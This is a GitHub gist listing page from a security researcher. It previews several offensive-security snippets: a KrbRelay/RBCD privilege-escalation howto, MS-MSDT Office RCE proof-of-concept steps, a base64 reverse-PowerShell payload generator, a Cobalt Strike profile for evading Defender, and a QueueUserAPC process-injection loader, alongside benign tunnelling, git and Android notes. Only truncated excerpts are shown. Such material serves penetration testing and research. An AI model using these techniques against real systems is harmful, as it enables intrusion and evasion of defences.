
@tothi
tothi / tunnel_vm_socks.txt
Last active October 14, 2024 15:43
tunnel virtualbox through socks (using poor man's vpn = ssh socks tunnel)
# ssh socks server on :5000 (tunnels traffic to tunnel-endpoint-server)
ssh -D5000 -NT -v user@tunnel-endpoint-server
# redsocks: https://github.com/darkk/redsocks
# 1.) as a socks client, listen on :4999 and connect to :5000
# 2.) run a dummy udp dns server on :5300 (to force the vm to fall back to tcp dns, which works through the ssh socks tunnel)
cat > redsocks.conf <<EOF
base { log_info=on; redirector=iptables; }
redsocks { local_ip=127.0.0.1; local_port=4999; ip=127.0.0.1; port=5000; type=socks4; }
dnstc { local_ip=127.0.0.1; local_port=5300; }
@tothi
tothi / krbrelay_privesc_howto.md
Last active October 14, 2024 00:58
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@tothi
tothi / ms-msdt.MD
Last active September 29, 2024 08:10
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@tothi
tothi / magisk_ramdisk_patch_avd.sh
Last active September 14, 2024 21:17
Apply Magisk patches on AVD (Android Emulator) RAMDISK images for running Magisk (root) on Android Emulators
#!/bin/bash
#
# patch ramdisk.img (for installing Magisk on x64 Android emulator)
#
# x86_64 on Android 12 (API Level 32) is supported/tested currently
#
# install AVD:
#
# sudo sdkmanager 'system-images;android-32;google_apis_playstore;x86_64'
@tothi
tothi / nmap-http-url.py
Last active September 9, 2024 17:39
Generate HTTP URLs from Nmap XML (and optionally use VirtualHosts)
#!/usr/bin/env python3
#
# inputs: nmap.xml (nmap scan xml output), subdomains.csv (optional virtualhost info, hostname + ip address csv file)
# output: url listing (useful for tools like EyeWitness)
#
# sample usage: ./nmap-http-url.py nmap.xml subdomains.csv | sort -u | gowitness file -f -
#
description = '''
Generate HTTP URLs from Nmap XML (and optionally additional VirtualHost listing, taken from e.g. subdomain enumeration).
@tothi
tothi / mkpsrevshell.py
Created February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
    print("USAGE: %s IP PORT" % sys.argv[0])
@tothi
tothi / git_cheatsheet.txt
Last active August 15, 2024 20:26
git cheatsheet for basic things
# git cheatsheet: some basic git instructions (w.i.p.)
# create bare repo for an existing source tree
git init --bare project.git
cd project.git
# edit exclude
edit info/exclude
# add files to bare repo
@tothi
tothi / android_burp.txt
Last active August 15, 2024 20:24
android emulator setup with sniffer CA
OBSOLETE: moved to Magisk + Magisk Trust User Certs module.
Emulator setup with Magisk: https://gist.github.com/tothi/1a206791c8b77d7e42015183c980657e
Magisk Trust User Certs module: https://github.com/NVISOsecurity/MagiskTrustUserCerts
android emulator clean install + prepare for https proxy analysis
=================================================================
# clean up old packages
@tothi
tothi / minimal-defender-bypass.profile
Last active August 15, 2024 20:16
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@tothi
tothi / DInjectQueuerAPC.cs
Last active August 15, 2024 20:00 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
/// Using with GadgetToJScript (e.g. for VBS payload):
/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs
/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll
/// 3.) test: cscript.exe DInjectQueuerAPC.vbs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading.Tasks;